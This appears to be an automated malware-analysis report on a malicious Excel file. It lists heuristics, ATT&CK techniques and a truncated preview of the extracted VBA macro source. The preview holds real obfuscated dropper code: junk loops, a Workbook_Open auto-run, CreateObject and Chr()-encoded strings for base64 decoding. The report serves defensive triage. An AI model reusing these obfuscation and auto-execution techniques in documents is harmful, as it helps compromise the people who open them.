MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
The file is an Excel document containing VBA macros, specifically a Workbook_Open macro. This macro utilizes obfuscated code and a CreateObject call, indicative of an attempt to download and execute a secondary payload. The presence of a Workbook_Open macro and the use of Shell() and CreateObject() strongly suggest a malicious intent to compromise the user's system.
Heuristics 6
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14912 bytes |
SHA-256: 5b469b88b74fae2504f6b8ebff164af2ad097304315547e5a6502b1c837ca762 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 8 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
afiaz3TRBL.Z3Q389FTSFnBvCvtmttC
While 11 = 4716
Dim Qf36kjP1FayWiR7IywiQBZYJk248gp As Variant
Wend
Dim kmmyK3_UQVrNL As Integer
While 6 = 6159
Dim QOac_l4zJbAzEqSrpQSZyKstFDHcdKhvLf3TYY34utbJxTvRAhpY As Variant
Wend
Dim vCEfqV_cZT83Mm As Integer
While 6 = 1086
Dim hw8QOXXn_rh5vPyb6eH1ZcwxrC2ZTXcQjpLeCPYAfG8V7uisn7XasU As Variant
Wend
Dim L__HiLe7Ro As Integer
While 6 = 5207
Dim NPT_CSYo_GSQeY16bHuV9AgMcGd3pLdhxQGpZdoTgsVkB4 As Variant
Wend
Dim hjQmsVK5oLr As Integer
While 15 = 1073
Dim Ek5xe82lucLQId8bZxOn5Khh4jCbGV As Variant
Wend
Dim l47S3teBud8PYUQ As Integer
While 27 = 4315
Dim GGu3tFYhw4BU445XdWkjVKIDr5vcH64GL As Variant
Wend
Dim kb4qNluLUIY As Integer
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "afiaz3TRBL"
Dim uwMx_ofaQriIIlnytfsRsnKuKxA9OwMLYiqU_jCUACLf2GUf6hVHBDnFkbkOnfKdcVsi4QtIbWQpZn2DbdCpZ_IU5jtl8vpczrC As String
Function zWkFzEc2xu558pIxS5Xz93HQa_qNuyVAAtMSSnmC(Xtqi2olr2BOoPYfQUgNn5NaQZ1FFLli7HFxGIot1NIZMcTJjn449w9cIRXHAgeeNbQeIjXFovVX)
While 7 = 9279
Dim vK6NlDSlNLqfERlS4dZZCQJ68PeQDXrasGXtD As Variant
Wend
Dim oFPxBcAwYi2 As Integer
While 12 = 8382
Dim GPDGeZrc__OTgAhzcOw741OMVIlAwHGhpmIvSi5QX4sCXvr As Variant
Wend
Dim vbmfflk7O_z As Integer
Dim oXG4zdWHvu_e_mjx8vlz6h8FZizuv3BITzoGD6iw4wvyz7uKUlQzVxAEYAcOnkV2ryIN8btBLx5HvHObwmYIkJvfxhrCaSHRY3E_wfM21Omg22SOtAaAKLPfBmY
While 4 = 1281
Dim uUxqo11qn41ue3Tdh9FKxiZygIkk5Do3vcxhcqN2K As Variant
Wend
Dim qGx5pGlKFC8GxAJ As Integer
While 11 = 6875
Dim HeNOuiM79A_uA1tM_Fak3zA8XwAqt8blmdg As Variant
Wend
Dim rm65gi8qFgYEKL4 As Integer
Dim hFypIeQpseXUeD_9vzDbE26y1x8_yQKEX6bIe4_FAyM6I3Gi74aprNIpI_xUfK1ZRR7hkzc1z6aOm_o
While 9 = 6472
Dim x3rRDRcOz7gfKAgbGeSAjCK3B5H4Z9qycz As Variant
Wend
Dim Ii3TYMNWE7_ As Integer
While 8 = 1046
Dim CuohDQi2KRtpxPHHhx1OrBU18hvE_uL7N38IbUUpF7PgX2DDPDohNpP As Variant
Wend
Dim AYxiedcvYEwa As Integer
While 8 = 755
Dim Q8pLaIHutwa_crx_Emrhl7smuzKlI1ZkZHuQWbF As Variant
Wend
Dim fdOkUdAunvSb_3R As Integer
While 28 = 8257
Dim TMBZj7fk3VznT7fllfmAFpGPPyZ7Wf8ffzZCTAeF_ As Variant
Wend
Dim VMeyoxGIq6a1Kn As Integer
Set hFypIeQpseXUeD_9vzDbE26y1x8_yQKEX6bIe4_FAyM6I3Gi74aprNIpI_xUfK1ZRR7hkzc1z6aOm_o = CreateObject(uwMx_ofaQriIIlnytfsRsnKuKxA9OwMLYiqU_jCUACLf2GUf6hVHBDnFkbkOnfKdcVsi4QtIbWQpZn2DbdCpZ_IU5jtl8vpczrC)
While 12 = 6247
Dim EtItfhMUXSFdebPj_e_LS3uaIkxLyB_o As Variant
Wend
Dim nu7i1tjao_yKq As Integer
While 27 = 719
Dim JQn2E5518TL9rj4s_eUMazteprN5hfRChs8RITsEHwoZsjHHoq As Variant
Wend
Dim ocb7OSgHJVp_RZ As Integer
eWukmxLonv7o6igvIceDWKWnSgGJppwzrkVpq2Y1MXdi74xBZ9f_TmnR9FPEpA988F7TL1_PDmz9qwpYs_spHvdD6CpikRJKXejz7byi4O6pwokKY1VjQRyKk2XHJdotbniJKzbOOIv2ywOOacIs = Chr(243 - 145) & Chr(132 - 27) & Chr(191 - 81) & Chr(124 - 78) & Chr(375 - 277) & Chr(167 - 70) & Chr(186 - 71) & Chr(170 - 69) & Chr(61 - 7) & Chr(293 - 241)
While 9 = 5516
Dim AHY8kjinv
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.